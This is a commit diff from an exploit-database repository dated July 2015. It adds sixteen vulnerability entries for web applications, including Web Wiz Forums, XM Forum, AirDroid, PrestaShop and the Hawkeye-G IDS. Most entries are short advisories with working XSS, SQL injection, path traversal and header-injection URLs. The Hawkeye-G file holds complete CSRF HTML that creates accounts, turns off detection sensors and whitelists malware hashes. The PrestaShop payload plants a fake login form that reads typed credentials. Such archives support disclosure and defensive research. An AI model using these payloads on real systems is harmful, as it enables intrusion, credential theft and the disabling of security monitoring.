DB: 2015-07-25

16 new exploits
2015-07-25 05:02:16 +00:00 · 2015-07-25 05:02:16 +00:00 · c22dc8c9d4
commit c22dc8c9d4
parent d6eaf56290
17 changed files with 640 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -10665,7 +10665,7 @@ id,file,description,date,author,platform,type,port
 11657,platforms/php/webapps/11657.txt,"Chaton <= 1.5.2 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0
 11660,platforms/php/webapps/11660.txt,"PHP File Sharing System 1.5.1 - Multiple Vulnerabilities",2010-03-09,blake,php,webapps,0
 11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
-11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
+11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin 0.3.1 - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
 11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver <= 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0
 11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0
 11667,platforms/php/webapps/11667.txt,"Joomla Component com_hezacontent 1.0 - SQL Injection Vulnerability (id)",2010-03-09,kaMtiEz,php,webapps,0
@ -33945,6 +33945,7 @@ id,file,description,date,author,platform,type,port
 37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80
 37603,platforms/php/webapps/37603.txt,"WordPress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80
 37604,platforms/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",php,webapps,80
 37622,platforms/php/webapps/37622.txt,"WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS",2015-07-16,"Filippos Mastrogiannis",php,webapps,0
 37607,platforms/windows/dos/37607.py,"Internet Download Manager - (.ief) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
 37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
 37609,platforms/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,xml,webapps,0
@ -33992,7 +33993,10 @@ id,file,description,date,author,platform,type,port
 37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0
 37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro 'page' Parameter Local File Include Vulnerability",2012-08-23,"Corrado Liotta",php,webapps,0
 37657,platforms/windows/local/37657.txt,"Microsoft Word Local Machine Zone Remote Code Execution Vulnerability",2015-07-20,"Eduardo Braun Prado",windows,local,0
 37688,platforms/php/remote/37688.txt,"PHP 'header()' HTTP Header Injection Vulnerability",2011-10-06,"Mr. Tokumaru",php,remote,0
 37659,platforms/php/webapps/37659.txt,"phpVibe < 4.20 Stored XSS",2015-07-20,"Filippos Mastrogiannis",php,webapps,0
 37660,platforms/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash Proof Of Concept",2015-07-20,"Reza Espargham",ios,dos,0
 37662,platforms/multiple/webapps/37662.txt,"Airdroid iOS_ Android & Win 3.1.3 - Persistent Vulnerability",2015-07-20,Vulnerability-Lab,multiple,webapps,0
 37663,platforms/linux/dos/37663.txt,"TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos,0
 37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' Arbitrary File Upload",2015-07-21,metasploit,java,remote,0
@ -34006,3 +34010,15 @@ id,file,description,date,author,platform,type,port
 37675,platforms/php/webapps/37675.txt,"Joomla! Komento Component 'cid' Parameter SQL Injection Vulnerability",2012-08-27,Crim3R,php,webapps,0
 37676,platforms/asp/webapps/37676.txt,"Power-eCommerce Multiple Cross Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0
 37677,platforms/php/webapps/37677.txt,"Wordpress Finder 'order' Parameter Cross Site Scripting Vulnerability",2012-08-25,Crim3R,php,webapps,0
 37678,platforms/asp/webapps/37678.txt,"Web Wiz Forums Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0
 37679,platforms/php/webapps/37679.txt,"LibGuides Multiple Cross Site Scripting Vulnerabilities",2012-08-25,Crim3R,php,webapps,0
 37680,platforms/php/webapps/37680.txt,"Mihalism Multi Host 'users.php' Cross Site Scripting Vulnerability",2012-08-25,Explo!ter,php,webapps,0
 37681,platforms/php/webapps/37681.txt,"WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure Vulnerability",2012-08-28,"Jan Van Niekerk",php,webapps,0
 37682,platforms/php/webapps/37682.txt,"WordPress Simple:Press Forum Plugin Arbitrary File Upload Vulnerability",2012-08-28,"Iranian Dark Coders",php,webapps,0
 37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
 37684,platforms/php/webapps/37684.html,"PrestaShop <= 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
 37685,platforms/xml/webapps/37685.txt,"squidGuard 1.4 Long URL Handling Remote Denial of Service Vulnerability",2012-08-30,"Stefan Bauer",xml,webapps,0
 37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,"John Page",multiple,webapps,0
 37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting Vulnerability",2012-08-30,HauntIT,php,webapps,0
 37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0
 37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0
--- a/platforms/asp/webapps/37678.txt
+++ b/platforms/asp/webapps/37678.txt
@ -0,0 +1,13 @@
 source: http://www.securityfocus.com/bid/55220/info
 Web Wiz Forums is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Web Wiz Forums 10.03 is vulnerable; other versions may also be affected. 
 http://www.example.com/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
 http://www.example.com/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
 http://www.www.example.com/post_message_form.asp?ForumID=63&mode=new&PagePosition=0&ReturnPage=Thread&ThreadPage="><script>alert(0);</script>&TopicID=57676 
--- a/platforms/asp/webapps/37689.txt
+++ b/platforms/asp/webapps/37689.txt
@ -0,0 +1,27 @@
 source: http://www.securityfocus.com/bid/55299/info
 XM Forum is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
 P0C : 
 HTTP HEADERS : 
 Host: www.example.com
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 Referer: http://www.example.com/chilli_forum/search.asp
 Cookie: TrackID=%7B54A35316%2D7519%2D405D%2D950A%2DA8CF50497150%7D; ASPSESSIONIDASSRDDBT=LPENAGHCNMNGMAOLEAJFMFOA
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 46
 Post Data --------------------
 terms=%27&stype=1&in=1&forum=-1&ndays=0&mname=
 Http response : 
 28 Microsoft OLE DB Provider for SQL Server 8 21 error ' 8 80040e14 8 ' 1f
 84 Unclosed quotation mark after the character string ') ORDER BY tbl_Categories.cOrder, tbl_Forums.fOrder, tbl_Topics.tLastPostDate'. 7 1f 
--- a/platforms/multiple/webapps/37662.txt
+++ b/platforms/multiple/webapps/37662.txt
@ -0,0 +1,173 @@
 Document Title:
 ===============
 Airdroid iOS, Android & Win 3.1.3 - Persistent Vulnerability
 References (Source):
 ====================
 http://www.vulnerability-lab.com/get_content.php?id=1543
 Release Date:
 =============
 2015-07-20
 Vulnerability Laboratory ID (VL-ID):
 ====================================
 1543
 Common Vulnerability Scoring System:
 ====================================
 3.9
 Product & Service Introduction:
 ===============================
 AirDroid allows you to access wirelessly and for free on your Android phone or tablet from Windows, Mac or the Internet, and to control it.
 (Copy of the Product Homepage: https://www.airdroid.com/de/ )
 Abstract Advisory Information:
 ==============================
 The Vulnerability Laboratory Core Research Team discovered an application-side input validation web vulnerability in the official SandStudio AirDroid (windows, ios and android) mobile web-application.
 Vulnerability Disclosure Timeline:
 ==================================
 2015-07-05: Researcher Notification & Coordination (Hadji Samir)
 2015-07-06: Vendor Notification (Security Team)
 2015-07-20: Public Disclosure (Vulnerability Laboratory)
 Discovery Status:
 =================
 Published
 Affected Product(s):
 ====================
 Sand Studio
 Product: AirDroid iOS Application (Andoird, Windows, MacOS & Web) 3.1.3
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ===============
 Medium
 Technical Details & Description:
 ================================
 A persistent input validation web vulnerability has been discovered  in the official SandStudio AirDroid (windows, ios and android) mobile web-application.
 The vulnerability allows remote attacker or low privilege user accounts to inject malicious codes to the application-side of the affected mobile web-application.
 The vulnerability is located in the send messages and the send message with an attached file  module. Remote attackers with low privilege user account are able to upload file name 
 with malicious strings like ``><script>alert(1).txt. On the arrival inbox occurs the execution of the malicious code that compromises the other target system/device user account.
 The vulnerability is located on the application-side and the request method to inject is POST.
 The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9.
 Exploitation of the application-side web vulnerability requires a low privilege web-application user account and low user interaction.
 Successful exploitation of the vulnerabilities results in persistent phishing mails, session hijacking, persistent external redirect to malicious 
 sources and application-side manipulation of affected or connected module context.
 Request Method(s):
 						[+] POST
 Vulnerable Module(s):
 						[+] Send Message
 Vulnerable Parameter(s):
 						[+] filename
 Affected Module(s):
 						[+] Message Inbox
 Proof of Concept (PoC):
 =======================
 The vulnerability can be exploited by remote attackers with low privilege application user account and low user interaction (click).
 For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
 PoC:
 <span class="name">"><"><script>alert(document.cookie).txt< span="">[PERSISTENT INJECTED SCRIPT CODE]
    <span class="progress-rate">100%</span>
    <a class="attach-del-icon"></a>
 </scrip...txt<></span>
 --- PoC Session Logs [POST] ---
 11:13:00.993[0ms][total 0ms] Status: pending[]
 POST https://upload.airdroid.com/sms/attachment/?fn=%22%3E%3Cscript%3Ealert(document.cookie).txt&d=&after=0&rtype=0&origin=http%3A%2F%2Fweb.airdroid.com&country=DZ&fname=%22%3E%3Cscript%3Ealert(document.cookie).txt 
 Load Flags[LOAD_BYPASS_CACHE  ] Content Size[unknown] Mime Type[unknown]
   Request Headers:
      Host[upload.airdroid.com]
      User-Agent[Mozilla/5.0 (X11; Linux i686; rv:39.0) Gecko/20100101 Firefox/39.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/octet-stream]
      Referer[http://web.airdroid.com/]
      Content-Length[5281]
      Origin[http://web.airdroid.com]
      Cookie[_SESSION=0b484eb230f27c004a7e990bace6175a416b58ed-%00_TS%3A1438769709%00; _ga=GA1.2.1046706455.1436177514; _gat=1; account_sid=c51d21b583ce76c04c8d4fa5a5c7496e; account_info=aW5mby5kaW1hbmV0QGdtYWlsLmNvbQ%3D%3D%2C63b971b729a756a3c1eb0fec6cccb736%2C9731220%2C59fd7af875fa5434a86e5397c79380d2]
   Post Data:
      POST_DATA[-PNG
 Note: We demonstrated the poc by usage of the web-app but the local app is also vulnerable to the same issue!
 Solution - Fix & Patch:
 =======================
 The vulnerbaility can be patched by a secure parse and encode of the vulnerable filename value in the send message module with the attach file function.
 Security Risk:
 ==============
 The security risk of the application-side input validation web vulnerability in the airdroid app is estimated as medium. (CVSS 3.9)
 Credits & Authors:
 ==================
 Vulnerability Laboratory [Research Team] - Hadji Samir [samir@evolution-sec.com]
 Disclaimer & Information:
 =========================
 The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
 or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
 in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
 or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
 consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
 policies, deface websites, hack into databases or trade with fraud/stolen material.
 Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
 Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
 Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
 Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
 Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
 Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
 Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
 electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
 Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
 is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
 (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
 				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
 -- 
 VULNERABILITY LABORATORY - RESEARCH TEAM
 SERVICE: www.vulnerability-lab.com
 CONTACT: research@vulnerability-lab.com
 PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
--- a/platforms/multiple/webapps/37686.txt
+++ b/platforms/multiple/webapps/37686.txt
@ -0,0 +1,250 @@
 # Exploit Title:  CSRF, Network Threat Appliance IDS / IPS
 # Google Dork: intitle: CSRF Network Threat Appliance IDS / IPS
 # Date: 2015-07-24
 # Exploit Author:  John Page ( hyp3rlinx )
 # Website: hyp3rlinx.altervista.org
 # Vendor Homepage: www.hexiscyber.com
 # Software Link:  www.hexiscyber.com/products/hawkeye-g
 # Version:  v3.0.1.4912
 # Tested on: windows 7 SP1
 # Category: Network Threat Appliance IDS / IPS
 Vulnerability Type:
 ===================
 CSRF
 CVE Reference:
 ==============
 CVE-2015-2878
 Vendor:
 ===================
 www.hexiscyber.com
 Product:
 =====================================================================
 Hawkeye-G v3.0.1.4912
 Hawkeye G is an active defense disruptive technology that detects,
 investigates, remediates and removes cyber threats within the network.
 Advisory Information:
 ====================================================
 Multiple CSRF(s) Vulnerabilities:
 Vulnerability Details:
 =====================
 1- CSRF Add arbitrary accounts to system
 ------------------------------------
 vulnerable URL:
 https://localhost:8443/interface/rest/accounts/json
 vulnerable POST parameter:
 'name'
 2- CSRF modification of network sensor settings
 ---------------------------------------------------------------------
 a) Turn off 'Url matching' Sensor
 b) Turn off 'DNS Inject' Sensor
 c) Turn off 'IP Redirect' Sensor
 vulnerable URL:
 https://localhost:8443/interface/rest/dpi/setEnabled/1
 vulnerable POST parameters:
 'url_match'
 'dns_inject'
 'ip_redirect'
 3- CSRF whitelisting of malware MD5 hash IDs
 ------------------------------------------------------
 vulnerable URL:
 https://localhost:8443/interface/rest/md5-threats/whitelist
 vulnerable POST parameter 'id'
 CSRF Exploit code(s):
 ====================
 <!DOCTYPE>
 <html>
 <script>
 /* Execute consecutive CSRF exploits */
 function ghostofsin(){
 var doc=document;
 var e1=doc.getElementById('exploit_1')
 e1.submit()
 var e2=doc.getElementById('exploit_2')
  e2.submit()
 var e3=doc.getElementById('exploit_3')
  e3.submit()
 var e4=doc.getElementById('exploit_4')
  e4.submit()
 }
 </script>
 <body onLoad="ghostofsin()">
 <!-- Add arbitrary accounts -->
 <form id="exploit_1" action="
 https://localhost:8443/interface/rest/accounts/json" method="post">
 <input type="text" name="human" value="true" />
 <input type="text" name="name" value="inverted_crosses" />
 <input type="text" name="domainId" value=""/>
 <input type="text" name="domain_id" value="" />
 <input type="text" name="roving" value="false" />
 </form>
 <!-- shutdown the 'Url Matching' Sensor that
 is responsible for detecting known malware domains -->
 <form id="exploit_2" action="
 https://localhost:8443/interface/rest/dpi/setEnabled/1" method="post">
 <input type="text" name="level" value="1" />
 <input type="text" name="enable" value="false" />
 <input type="text" name="attribute" value="url_match"/>
 </form>
 <!-- set the DNS Inject Network Sensor to off -->
 <form id="exploit_3" action="
 https://localhost:8443/interface/rest/dpi/setEnabled/1" method="post">
 <input type="text" name="level" value="1" />
 <input type="text" name="enable" value="false" />
 <input type="text" name="attribute" value="dns_inject"/>
 </form>
 <!-- set the IP Redirect Network Sensor to off -->
 <form id="exploit_4" action="
 https://localhost:8443/interface/rest/dpi/setEnabled/1" method="post">
 <input type="text" name="level" value="1" />
 <input type="text" name="enable" value="false" />
 <input type="text" name="attribute" value="ip_redirect"/>
 </form>
 </body>
 </html>
 Whitelist MD5 malware IDs CSRF:
 -------------------------------
 In final CSRF POC to try an white list malware MD5 IDs will be a bit more
 complex,
 we need to submit form many times hidden in background using iframe so we
 stay on same page.
 Seems all MD5 ID's end in 0001 and are 8 bytes in length, we just need a
 loop an create some
 numbers 8 bytes long and dynamically assign the 'id' value of the field and
 execute multiple
 POST requests in background, it will be hit or miss unless you know ahead
 of time the MD5 ID
 in the database your targeting.
 e.g. Malware MD5 database ID 28240001
 So Here we go!...
 <!-- whitelist MD5 malware IDs -->
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
 "http://www.w3.org/TR/html4/loose.dtd">
 <html>
 <head>
 <title>CSRF POC hyp3rlinx</title>
 <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
 </head>
 <body>
 <form id="hell" action="
 https://localhost:8443/interface/rest/md5-threats/whitelist"
 target="demonica" method="post">
 <input type="hidden" name="id" id="id"><br>
 </form>
 <IFRAME style="display:none" name="demonica"></IFRAME>
 <script>
 var doc=document
 var x=1000
 exorcism()
 function exorcism(){
 x++
 String(x)
 x+="0001"
 var f=doc.getElementById('hell')
 var e=doc.getElementById('id')
 e.value=x
  x=x.substr(0,4)
 f.submit()
 }
 setInterval("exorcism()",100)
 </script>
 </body>
 </html>
 Disclosure Timeline:
 =========================================================
 Vendor Notification: June 30, 2015
 July 24, 2015 : Public Disclosure
 Severity Level:
 =========================================================
 High
 Description:
 ==========================================================
 Request Method(s):              [+] POST
 Vulnerable Product:             [+] Hawkeye-G v3.0.1.4912
 Vulnerable Parameter(s):        [+] name, enable, id
 Affected Area(s):               [+] Network Threat Appliance, Local Domain
 ============================================================================
 [+] Disclaimer
 Permission is hereby granted for the redistribution of this advisory,
 provided that it is not altered except by reformatting it, and that due
 credit is given. Permission is explicitly given for insertion in
 vulnerability databases and similar, provided that due credit is given to
 the author.
 The author is not responsible for any misuse of the information contained
 herein and prohibits any malicious use of all security related information
 or exploits by the author or elsewhere.
 (hyp3rlinx)
--- a/platforms/php/remote/37688.txt
+++ b/platforms/php/remote/37688.txt
@ -0,0 +1,14 @@
 source: http://www.securityfocus.com/bid/55297/info
 PHP is prone to a vulnerability that allows attackers to inject arbitrary headers through a URL.
 By inserting arbitrary headers, attackers may be able to launch cross-site request-forgery, cross-site scripting, HTML-injection, and other attacks.
 PHP 5.1.2 is vulnerable; other versions may also be affected. 
 <?php
 header('Location: '.$_GET['url']);
 print_r($_COOKIE);
 ?>
 http://www.example.com/head1.php?url=http://example.com/head1.php%0DSet-Cookie:+NAME=foo 
--- a/platforms/php/webapps/37622.txt
+++ b/platforms/php/webapps/37622.txt
@ -0,0 +1,32 @@
 # WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS
 # Vendor Homepage: http://www.wpdownloadmanager.com
 # Software Link: https://wordpress.org/plugins/download-manager
 # Affected Versions: Free 2.7.94 & Pro 4
 # Tested on: WordPress 4.2.2
 # Discovered by Filippos Mastrogiannis
 # Twitter: @filipposmastro
 # LinkedIn: https://www.linkedin.com/pub/filippos-mastrogiannis/68/132/177
 -- Description --
 This stored XSS vulnerability allows any authenticated wordpress user
 to inject malicious code via the name of the uploaded file:
 e.g. <svg onload=3D3Dalert(0)>.jpg
 The vulnerability exists because the file name is not properly sanitized
 and this can lead to malicious code injection that will be executed on the
 target=3DE2=3D80=3D99s browser
 -- Proof of Concept --
 1. The attacker creates a new download package via the plugin's menu
 and uploads a file with the name: <svg onload=3D3Dalert(0)>.jpg
 2. The stored XSS can be triggered when an authenticated user (e.g. admin)
 attempts to edit this download package
 -- Solution --
 Upgrade to the latest version
--- a/platforms/php/webapps/37659.txt
+++ b/platforms/php/webapps/37659.txt
@ -0,0 +1,30 @@
 # phpVibe < 4.20 Stored XSS
 # Vendor Homepage: http://www.phpvibe.com
 # Affected Versions: prior to 4.20
 # Discovered by Filippos Mastrogiannis
 # Twitter: @filipposmastro
 # LinkedIn: https://www.linkedin.com/pub/filippos-mastrogiannis/68/132/177
 -- Description --
 This stored XSS vulnerability allows any logged in user
 to inject malicious code in the comments section:
 e.g. "><body onLoad=confirm("XSS")>
 The vulnerability exists because the user input is not properly sanitized
 and this can lead to malicious code injection that will be executed on the
 target’s browser
 -- Proof of Concept --
 1. The attacker posts a new comment which contains our payload:
 "><body onLoad=confirm("XSS")>
 2. The stored XSS can be triggered when any user visits the link of the
 uploaded content
 -- Solution --
 The vendor has fixed the issue in the version 4.21
--- a/platforms/php/webapps/37679.txt
+++ b/platforms/php/webapps/37679.txt
@ -0,0 +1,13 @@
 source: http://www.securityfocus.com/bid/55222/info
 LibGuides is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
 http://www.example.com/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
 http://www.example.com/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
 http://www.example.com/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
 http://www.example.com/mobile.php?action=8&gid=&iid=145&search=%22%3E%3Cscript%3Ealert(0);%3C/script%3E 
--- a/platforms/php/webapps/37680.txt
+++ b/platforms/php/webapps/37680.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/55237/info
 Mihalism Multi Host is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 Mihalism Multi Host 5.0 is vulnerable; other versions may also be affected. 
 http://www.example.com/users.php?act=register&return=/><sCrIpT>alert('Explo!ter')</sCrIpT> 
--- a/platforms/php/webapps/37681.txt
+++ b/platforms/php/webapps/37681.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/55241/info
 The Cloudsafe365 plugin for WordPress is prone to a file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
 An attacker can exploit this vulnerability to view local files in the context of the web server process. This may aid in further attacks. 
 http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php
 http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php 
--- a/platforms/php/webapps/37682.txt
+++ b/platforms/php/webapps/37682.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/55243/info
 The Simple:Press Forum plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
 An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 
 http://www.example.com/wp/wp-content/plugins/simple-forum/forum/uploader/sf-uploader.php?id=4&folder=uploads/forum/petas 
--- a/platforms/php/webapps/37683.txt
+++ b/platforms/php/webapps/37683.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/55275/info
 Phorum is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 Phorum 5.2.18 is vulnerable; other versions may also be affected. 
 http://www.example.com/control.php?0,panel=groupmod,group=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 
--- a/platforms/php/webapps/37684.html
+++ b/platforms/php/webapps/37684.html
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/55280/info
 PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
 <form action="http://[host]/[ADMIN_PANEL]/ajax.php" method="post"> <input type="hidden" name="ajaxProductsPositions" value='' /> <input type="hidden" name="id_product" value='1' /> <input type="hidden" name="id_category" value='1' /> <input type="hidden" name='product[<form action="/[ADMIN_PANEL]/login.php" method="post"><input type="text" id="email" name="email" value="" class="input"/><input id="passwd" type="password" name="passwd" class="input" value=""/></form><script>function hackfunc() { alert("Your Login: "+document.getElementById("email").value+"\nYour Password: "+document.getElementById("passwd").value); } setTimeout("hackfunc()", 1000);</script>]' value='1_1_1' /> <input type="submit" id="btn"> </form> 
--- a/platforms/php/webapps/37687.txt
+++ b/platforms/php/webapps/37687.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/55295/info
 TomatoCart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 TomatoCart 1.1.7 is vulnerable; other versions may also be affected. 
 http://www.example.com/with/tomato/ext/secureimage/example_from.ajax.php/"></script><whatever.now> 
--- a/platforms/php/webapps/37690.txt
+++ b/platforms/php/webapps/37690.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/55315/info
 Crowbar is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
 http://www.example.com/utils?waiting=true&file=foo'%3B})% 3B}alert(document.cookie)</script><!-- 
--- a/platforms/xml/webapps/37685.txt
+++ b/platforms/xml/webapps/37685.txt
@ -0,0 +1,14 @@
 source: http://www.securityfocus.com/bid/55291/info
 squidGuard is prone to a remote denial-of-service vulnerability.
 A successful exploit will cause the application to enter emergency mode in which URLs are not blocked. This will result in a denial-of-service condition.
 squidGuard 1.4 is vulnerable; other versions may also be affected. 
 http://www.example.com/_playlist/playlist.xml?parm=0.25732559903520535?parm=0.8294737075929047?parm=0.24014121683296297?parm=0.9460915929498649?parm=0.3974535575371201?parm=0.797955814252201?parm=0.5941665450866088?parm=0.6912115486553755?parm=0.05073890069479603?parm=0.8963961504041598?parm=0.43654825009701137?parm=0.8214705010294044?parm=0.5274569610084057?parm=0.0007274525371858687?parm=0.14506218122553893?parm=0.49125362580323495?parm=0.6941617625067622?parm=0.7331781580530978?parm=0.6610984755864507?parm=0.8694141102186517?parm=0.1290539846224843?parm=0.45549314193532453?parm=0.860371532284247?parm=0.019043415282676057?parm=0.1470360022957906?parm=0.9782236742775064?parm=0.24810547207701195?parm=0.5038849472610185?parm=0.32986064536502857?parm=0.3443933666849265?parm=0.8665425396928025?parm=0.8360460125669642?parm=0.11572512117125244?pa
